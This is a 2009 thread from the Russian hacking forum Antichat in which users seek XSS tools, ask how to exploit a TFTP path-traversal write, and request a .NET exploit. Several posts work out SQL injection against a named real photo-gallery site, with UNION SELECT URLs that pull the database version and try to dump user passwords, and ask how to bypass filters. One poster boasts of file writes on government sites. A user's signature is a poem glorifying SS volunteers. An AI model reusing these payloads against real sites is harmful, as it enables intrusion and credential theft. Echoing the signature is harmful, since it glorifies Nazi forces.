HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.11.2009, 01:23
Axelhack
Новичок
Регистрация: 19.11.2009
Сообщений: 1
С нами: 8671999

Репутация: 0
Question

Всем привет,

2 вопроса

1. Бесплатный хостинг для XSS и
2. сканер XSS багов на сайте.

Прошу помочь. Благодарен Axelhack.
 
Ответить с цитированием

  #2  
Старый 20.11.2009, 07:44
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Подскажите, сканер выплюнул:

С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.

В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
ФТП может висеть на удп? если да,то как приконектиться?

Последний раз редактировалось p.r0phe.t; 20.11.2009 в 07:56..
 
Ответить с цитированием

  #3  
Старый 20.11.2009, 15:00
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Подскажите, сканер выплюнул:

С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
 
Ответить с цитированием

  #4  
Старый 20.11.2009, 15:25
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Цитата:
Сообщение от GenTao  
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
 
Ответить с цитированием

  #5  
Старый 21.11.2009, 03:56
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
 
Ответить с цитированием

  #6  
Старый 20.11.2009, 10:21
Nosfer
Новичок
Регистрация: 10.01.2007
Сообщений: 16
С нами: 10174902

Репутация: 2
По умолчанию

кто может подсказать по скуле в
http://www.pngbd.com/photos/showgallery.php?cat=1'
Никак не выходит, толи поля не подпираются, толи фильтр какой-то
 
Ответить с цитированием

  #7  
Старый 20.11.2009, 10:26
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
почему я подумал про скобку )))


http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3 ,4%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #8  
Старый 20.11.2009, 10:33
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
 
Ответить с цитированием

  #9  
Старый 21.11.2009, 11:52
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

цитирую
Цитата:
Сообщение от YuNi|[c  
есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
 
Ответить с цитированием

  #10  
Старый 20.11.2009, 16:40
Nosfer
Новичок
Регистрация: 10.01.2007
Сообщений: 16
С нами: 10174902

Репутация: 2
По умолчанию

http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,passw ord,3,4+from+matryx_photos.users%23

видимо стоят фильтры на password,users итд есть идеи как обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.